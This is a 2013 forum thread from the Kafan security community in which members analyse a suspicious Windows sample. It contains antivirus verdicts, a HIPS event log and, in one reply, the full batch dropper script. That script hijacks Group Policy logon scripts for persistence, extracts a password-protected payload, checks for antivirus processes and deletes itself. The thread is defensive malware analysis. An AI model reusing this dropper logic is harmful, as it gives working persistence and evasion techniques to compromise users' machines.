收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 可疑文件 J花门
12下一页
返回列表 发新帖
查看: 2983|回复: 10
收起左侧

[可疑文件] 可疑文件 J花门

[复制链接]
zyx9
发表于 2013-2-1 12:17:22 | 显示全部楼层 |阅读模式
本帖最后由 zyx9 于 2013-2-1 14:44 编辑

最近网上某J花XX照 中附带可疑文件一枚




VT 6 / 46 https://www.virustotal.com/file/ ... nalysis/1359691854/
火眼 http://fireeye.ijinshan.com/anal ... bb32f04b&type=1
comodo http://camas.comodo.com/cgi-bin/ ... c0aa85697b78c7f340d

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

3801187
发表于 2013-2-1 12:20:20 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

wqcaokeyinwq
发表于 2013-2-1 12:23:46 | 显示全部楼层
微点秒杀。




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

zmzcy
发表于 2013-2-1 12:45:40 | 显示全部楼层
完整路径: 不可用
威胁: SONAR.Heuristic
____________________________
____________________________

在电脑上的创建时间 
不可用


上次使用时间 
(  )


启动项目 



已启动 


____________________________
____________________________
未知
诺顿社区中使用此文件的用户数量: 未知
____________________________
未知
此文件版本当前未知。
____________________________

此文件具有高风险。
____________________________
威胁详细信息
SONAR 主动防护监视电脑上的可疑程序活动。
____________________________




file origin tree








____________________________
文件操作
serubzha.exe
不需要操作
____________________________
网络操作
未采取操作
____________________________
系统设置操作
未采取操作
serubzha.exe
未采取操作


平均资源使用率:
未知


平均CPU 使用率:
未知


平均内存使用率:
未知


____________________________
文件指纹 - SHA:
不可用
____________________________
文件指纹 - MD5:
不可用
____________________________
回复

举报

倾枫锝渔♂
发表于 2013-2-1 12:52:36 | 显示全部楼层
数字   qvm 06
回复

举报

sanhu35
发表于 2013-2-1 13:05:49 | 显示全部楼层
本帖最后由 sanhu35 于 2013-2-1 13:15 编辑

2013/2/1 13:04:28    创建新进程    允许
进程: c:\windows\explorer.exe
目标: c:\users\sanhu35\desktop\1.exe
命令行: "C:\Users\sanhu35\Desktop\1.exe"
规则: [应用程序]c:\windows\explorer.exe

2013/2/1 13:04:28    修改文件    阻止
进程: c:\users\sanhu35\desktop\1.exe
目标: \Device\NamedPipe\{A4A8723A-44EA-465e-A48F-1A700FC991C7}
规则: [文件组]命令管道 -> [文件]\device\namedpipe\*

2013/2/1 13:04:32    创建新进程    允许
进程: c:\users\sanhu35\desktop\1.exe
目标: c:\windows\temp\360上网保镖.exe
命令行: "C:\Windows\temp\360上网保镖.exe"
规则: [应用程序]*

2013/2/1 13:04:32    创建新进程    阻止
进程: c:\windows\temp\360上网保镖.exe
目标: c:\windows\system32\reg.exe
命令行: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager" /v "PendingFileRenameOperations2" /t "REG_MULTI_SZ" /d "\??\c:\WINDOWS\mui0\0\??%c:\WINDOWS\mui\0\??\c:\WINDOWS\mui\scripts.ini\0\??\c:\WINDOWS\system32\GroupPolicy\user\Scripts\scr
规则: [应用程序]* -> [子应用程序]『禁运』黑名单

2013/2/1 13:04:32    创建新进程    阻止
进程: c:\windows\temp\360上网保镖.exe
目标: c:\windows\system32\cmd.exe
命令行: cmd /c C:\Windows\temp\s1.bat
规则: [应用程序]* -> [子应用程序]『禁运』黑名单


bat内容:
  1. if exist %windir%\Media\error.s8 goto over
  2. move we.bat %windir%\Media\s1.bat
  3. move sas.gif %windir%\Media\sas.gif
  4. move sas.exe %windir%\Media\sas.exe
  5. move we.dll %windir%\Media\Seext.dll
  6. move 360上网保镖.exe %windir%\Media\360上网保镖.exe
  7. setlocal enabledelayedexpansion
  8. set "svar=abcdefghijklmnopqrstuvwxyz"
  9. set "rvar="
  10. set num=5
  11. set sd=360tray
  12. :loop
  13. set /a num-=1
  14. set /a rand=%random%%%26
  15. set "rvar=%rvar%!svar:~%rand%,1!"
  16. if not %num%==0 goto loop
  17. set di=%systemroot%\system32\GroupPolicy\user\Scripts
  18. echo !rvar! > %windir%\Media\error.s8
  19. md %di%\Startup
  20. md %di%\Shutdown
  21. md %windir%\mui
  22. attrib %windir%\system32\GroupPolicy\*.* -r -s -h /s /d
  23. del %windir%\System32\GroupPolicy\gpt.ini
  24. ren %windir%\system32\GroupPolicy\Machine\Registry.pol %windir%\system32\GroupPolicy\Machine\Registry.txt
  25. set qs=%systemroot%\system32\GroupPolicy
  26. >%qs%\gpt.ini echo [General]
  27. >>%qs%\gpt.ini echo gPCFunctionalityVersion=2
  28. >>%qs%\gpt.ini echo gPCUserExtensionNames=[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B66650-4972-11D1-A7CA-0000F87571E3}]
  29. >>%qs%\gpt.ini echo Version=65536
  30. >scripts.ini echo [Logon]
  31. >>scripts.ini echo 0CmdLine=%windir%\Media\360上网保镖.exe
  32. move scripts.ini %windir%\Media\scripts.ini
  33. copy %windir%\Media\scripts.ini %windir%\mui\scripts.ini
  34. del /f /s /q %di%\scripts.ini

  36. tasklist|findstr /i "ravmond.exe %sd%.exe kxetray.exe "
  37. if errorlevel 1 (goto 360) else (goto ris)
  38. :360
  39. %windir%\Media\sas.exe e -o+ -p1234qwer %windir%\Media\sas.gif
  40. type %windir%\Media\error.s8>>woti.dat
  41. type %windir%\Media\error.s8>>my.dat
  42. move woti.dat %windir%\mui\ser!rvar!.chm
  43. start %windir%\system32\rundll32.exe %windir%\mui\ser!rvar!.chm,Launch
  44. move my.dat %windir%\mui\ser!rvar!.exe
  45. start %windir%\mui\ser!rvar!.exe
  46. del Seext.dll
  47. del %0
  48. exit
  49. :ris
  50. del Seext.dll
  51. del %0
  52. exit
  53. :over
  54. del Seext.dll
  55. del we.dll
  56. del 360上网保镖.exe
  57. del sas.exe
  58. del sas.gif
  59. del we.bat
  60. del %0
  61. exit
复制代码
将下图的转移到C:\Windows\Media






衍生物:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

zxy_001
发表于 2013-2-1 13:25:47 | 显示全部楼层
趋势miss
回复

举报

haoge250
发表于 2013-2-1 13:32:47 | 显示全部楼层

过BD扫描,双击拦截。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

dongwenqi
发表于 2013-2-1 15:17:04 | 显示全部楼层
Hello,


Trojan.Win32.Agentb.hxy

New malicious software was found in the attached file. Its detection will be included in the next update.
Thank you for your help.

Regards, Ye Jin
Junior Virus Analyst, Kaspersky Lab.
回复

举报

蓝天二号
发表于 2013-2-1 19:17:44 | 显示全部楼层
沙箱运行




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-9 23:44 , Processed in 0.132780 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表